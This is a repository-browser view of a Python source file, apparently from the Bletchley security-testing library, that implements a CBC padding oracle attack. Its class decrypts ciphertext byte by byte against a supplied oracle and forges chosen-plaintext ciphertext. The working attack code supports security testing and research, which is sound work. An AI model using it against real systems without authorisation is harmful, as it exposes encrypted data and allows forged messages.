source: trunk/lib/bletchley/CBC/__init__.py @ 37

Last change on this file since 37 was 37, checked in by tmorgan, 11 years ago

fixed problem with decrypt function when starting with partially completed decryption

File size: 13.0 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class POA:
29    """This class implements padding oracle attacks given a ciphertext and
30    function that acts as a padding oracle.
31
32    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
33    This attack was first described in:
34     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
35      WTLS" by Serge Vaudenay (2002)
36
37    POA objects are not caller thread-safe.  If multiple threads need to work
38    simultaneously on the same ciphertext and oracle, create a
39    separate instance. POA objects can execute tasks internally using
40    multiple threads, however.
41
42    """
43
44    ## private
45    _thread_result = None
46    _oracle = None
47    _ciphertext = None
48    _iv = None
49
50    ## protected (reading ok, changing not ok)
51    block_size = None
52
53    ## public (r/w ok)
54    decrypted = None
55    threads = None
56    log_fh = None
57   
58    def __init__(self, oracle, block_size, ciphertext, iv=None,
59                 threads=1, decrypted='', log_file=None):
60        """Creates a new padding oracle attack (POA) object.
61
62        Arguments:
63        oracle -- A function which returns True if the given ciphertext
64         results in a correct padding upon decryption and False
65         otherwise.  This function should implement the prototype:
66           def myOracle(ciphertext, iv): ...
67         If the initialization vector (iv) is unknown is not included in
68         the ciphertext message, it can be ignored in the oracle
69         implementation (though some limitations will result from this).
70
71        block_size -- The block size of the ciphertext being attacked.
72         Is almost always 8 or 16.
73
74        ciphertext -- The ciphertext to be decrypted
75
76        iv -- The initialization vector associated with the ciphertext.
77         If none provided, it is assumed to be a block of 0's
78
79        threads -- The maximum number of parallel threads to use during
80         decryption.  If more than one thread is used, then the oracle
81         function will be called in parallel.  It should implement any
82         internal locking necessary to prevent race conditions where
83         applicable.
84
85        decrypted -- If a portion of the plaintext is already known (due
86         to a prior, partially successful decryption attempt), then this
87         may be used to restart the decryption process where it was
88         previously left off.  This argument is assumed to contain the
89         final N bytes (for an N-byte argument) of the plaintext; that
90         is, the tail of the plaintext.
91
92        log_file -- A Python file object where log messages will be
93         written.
94
95        """
96
97        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
98            raise InvalidBlockError(block_size,len(ciphertext))
99        if(iv != None and len(iv)%block_size != 0):
100            raise InvalidBlockError(block_size,len(iv))
101
102        self.block_size = block_size
103        self.decrypted = decrypted
104        self.threads = threads
105        self.log_fh = log_file
106
107        self._oracle = oracle
108        self._ciphertext = ciphertext
109        if iv == None:
110            self._iv = '\x00'*self.block_size
111        else:
112            self._iv = iv
113
114
115    def log_message(self, s):
116        if self.log_fh != None:
117            self.log_fh.write(s+'\n')
118
119
120    def probe_padding(self, prior, final):
121        """Attempts to verify that a CBC padding oracle exists and then determines the
122        pad value. 
123
124        Returns the pad string, or None on failure.
125        XXX: Currently only works for PKCS 5/7.
126        """
127
128        ret_val = None
129        # First probe for beginning of pad
130        for i in range(0-self.block_size,0):
131            if i == -1:
132                break
133            tweaked = struct.unpack("B", prior[i])[0] ^ 0xFF
134            tweaked = struct.pack("B", tweaked)
135            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final, self._iv):
136                break
137
138        pad_length = 0-i
139        self.log_message("Testing suspected pad length: %d" % pad_length)
140        if pad_length > 1:
141            # Verify suspected pad length by changing last pad byte to 1
142            # and making sure the padding succeeds
143            tweaked = struct.unpack("B", prior[-1])[0] ^ (pad_length^1)
144            tweaked = struct.pack("B", tweaked)
145            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final, self._iv):
146                ret_val = buffertools.pkcs7Pad(pad_length)
147
148        else:
149            # Verify by changing pad byte to 2 and brute-force changing
150            # second-to-last byte to 2 as well
151            tweaked = struct.unpack("B", prior[-1])[0] ^ (2^1)
152            tweaked = struct.pack("B", tweaked)
153            for j in range(1,256):
154                guess = struct.unpack("B", prior[-2])[0] ^ j
155                guess = struct.pack("B", guess)
156                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final, self._iv):
157                    # XXX: Save the decrypted byte for later
158                    ret_val = buffertools.pkcs7Pad(pad_length)
159
160        if ret_val:
161            self.decrypted = ret_val
162
163        return ret_val
164
165
166    # XXX: This could be generalized as a byte probe utility for a variety of attacks
167    def _test_value_set(self, prefix, suffix, value_set):
168        for b in value_set:
169            if self._thread_result != None:
170                # Stop if another thread found the result
171                break
172            if self._oracle(str(prefix+struct.pack("B",b)+suffix), self._iv):
173                self._thread_result = b
174                break
175
176
177    def decrypt_next_byte(self, prior, block, known_bytes):
178        """Decrypts one byte of ciphertext by modifying the prior
179        ciphertext block at the same relative offset.
180
181        Arguments:
182        prior -- Ciphertext block appearing prior to the current target
183        block -- Currently targeted ciphertext block
184        known_bytes -- Bytes in this block already decrypted
185
186        """
187
188        if(len(block)!=self.block_size):
189            raise InvalidBlockError
190        numKnownBytes = len(known_bytes)
191       
192        if(numKnownBytes >= self.block_size):
193            return known_bytes
194       
195        prior_prefix = prior[0:self.block_size-numKnownBytes-1]
196        base = ord(prior[self.block_size-numKnownBytes-1])
197        # Adjust known bytes to appear as a PKCS 7 pad
198        suffix = [0]*numKnownBytes
199        for i in range(0,numKnownBytes):
200            suffix[i] ^= ord(prior[0-numKnownBytes+i])^ord(known_bytes[i])^(numKnownBytes+1)
201        suffix = struct.pack("B"*len(suffix),*suffix)+block
202
203        # Each thread spawned searches a subset of the next byte's
204        # 256 possible values
205        self._thread_result = None
206        threads = []
207        for i in range(0,self.threads):
208            t = threading.Thread(target=self._test_value_set, 
209                                 args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.threads)))
210            t.start()
211            threads.append(t)
212           
213        for t in threads:
214            t.join()
215       
216        if self._thread_result == None:
217            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
218            raise Exception
219
220        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
221        self.decrypted = decrypted + self.decrypted
222        #  Return previous bytes together with current byte
223        return decrypted+known_bytes
224   
225
226    def decrypt_block(self, prior, block, last_bytes=''):
227        """Decrypts the block of ciphertext provided as a parameter.
228
229        """
230
231        while(len(last_bytes)!=self.block_size):
232            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)
233
234        self.log_message("Decrypted block: %s" % repr(last_bytes))
235        return last_bytes
236
237
238    # XXX: Add logic to begin where decryption previously left off
239    def decrypt(self):
240        """Decrypts the previously supplied ciphertext. If the IV was
241        not provided, it assumes a IV of zero bytes.
242
243        """
244
245        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
246
247        if len(self.decrypted) == 0:
248           
249            final = blocks[-1]
250            if len(blocks) == 1:
251                # If only one block present, then try to use IV as prior
252                prior = self._iv
253            else:
254                prior = blocks[-2]
255
256            # Decrypt last block, starting with padding (quicker to decrypt)
257            pad_bytes = self.probe_padding(prior, final)
258            if pad_bytes == None:
259                # XXX: custom exception
260                raise Exception
261
262            decrypted = self.decrypt_block(prior, final, pad_bytes)
263
264            # Now decrypt all other blocks except first block
265            for i in range(len(blocks)-2, 0, -1):
266                decrypted = self.decrypt_block(blocks[i-1], blocks[i]) + decrypted
267
268            # Finally decrypt first block
269            decrypted = self.decrypt_block(self._iv, blocks[0]) + decrypted
270       
271        # Start where we left off last
272        # XXX: test this more
273        else: 
274            num_partial = len(self.decrypted) % self.block_size
275            finished_blocks = len(self.decrypted) / self.block_size
276            partial = self.decrypted[0:num_partial]
277            decrypted = self.decrypted[num_partial:]
278
279            for i in range(len(blocks)-1-finished_blocks, 0, -1):
280                decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
281                partial = ''
282               
283            # Finally decrypt first block
284            decrypted = self.decrypt_block(self._iv, blocks[0]) + decrypted
285           
286        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)
287
288
289    def encrypt_block(self, plaintext, ciphertext):
290        """Encrypts a block of plaintext.  This is accomplished by
291        decrypting the supplied ciphertext and then computing the prior
292        block needed to create the desired plaintext at the ciphertext's
293        location.
294
295        Returns the calculated prior block and the provided ciphertext
296        block as a tuple.
297
298        """
299        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
300            raise InvalidBlockError(self.block_size,len(plaintext))
301
302        ptext = self.decrypt_block('\x00'*self.block_size, ciphertext)
303        prior = buffertools.xorBuffers(ptext, plaintext)
304        return prior,ciphertext
305   
306   
307    def encrypt(self,plaintext):
308        """Encrypts a plaintext value through "CBC-R" style prior-block
309        propagation.
310       
311        Returns a tuple of the IV and ciphertext. 
312
313        NOTE: If your target messages do not include an IV with the
314        ciphertext, you can instead opt to encrypt a suffix of the
315        message and include the IV in the the middle of the ciphertext as
316        if it were an encrypted block. This one block alone will decrypt
317        to an uncontrollable random value, but with careful placement,
318        this might be ok.
319
320        """
321
322        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size), 
323                                         self.block_size)
324
325        if (len(self.decrypted) >= self.block_size
326            and len(self._ciphertext) >= 2*self.block_size):
327            # If possible, reuse work from prior decryption efforts on original
328            # message for last block
329            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
330            final_plaintext = self.decrypted[0-self.block_size:]
331            prior = buffertools.xorBuffers(old_prior,
332                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
333            ciphertext = self._ciphertext[0-self.block_size:]
334        else:
335            # Otherwise, select a random last block and generate the prior block
336            ciphertext = struct.pack("B"*self.block_size, 
337                                     *[random.getrandbits(8) for i in range(self.block_size)])
338            prior,ciphertext = self.encrypt_block(blocks[-1], ciphertext)
339
340        # Continue generating all prior blocks
341        for i in range(len(blocks)-2, -1, -1):
342            prior,cblock = self.encrypt_block(blocks[i],prior)
343            ciphertext = cblock+ciphertext
344       
345        # prior as IV
346        return str(prior),str(ciphertext)
Note: See TracBrowser for help on using the repository browser.